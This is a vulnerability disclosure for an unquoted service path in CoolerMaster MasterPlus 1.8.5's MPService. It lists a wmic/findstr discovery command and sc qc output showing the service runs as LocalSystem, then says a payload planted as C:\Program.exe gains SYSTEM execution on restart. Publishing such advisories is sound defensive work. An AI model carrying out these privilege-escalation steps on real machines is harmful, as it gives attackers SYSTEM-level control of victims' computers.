CoolerMaster MasterPlus 1.8.5 Unquoted Service Path

# Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path# Date: 11/17/2022# Exploit Author: Damian Semon Jr (Blue Team Alpha)# Version: 1.8.5# Vendor Homepage: https://masterplus.coolermaster.com/# Software Link: https://masterplus.coolermaster.com/# Tested on: Windows 10 64x# Step to discover the unquoted service path:wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """CoolerMaster MasterPlus Technology Service  MPService  C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe  Auto# Info on the service:C:\>sc qc MPService[SC] QueryServiceConfig SUCCESSSERVICE_NAME: MPService        TYPE               : 10  WIN32_OWN_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : CoolerMaster MasterPlus Technology Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem                        #Exploit:A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger. Ex: (C:\Program.exe)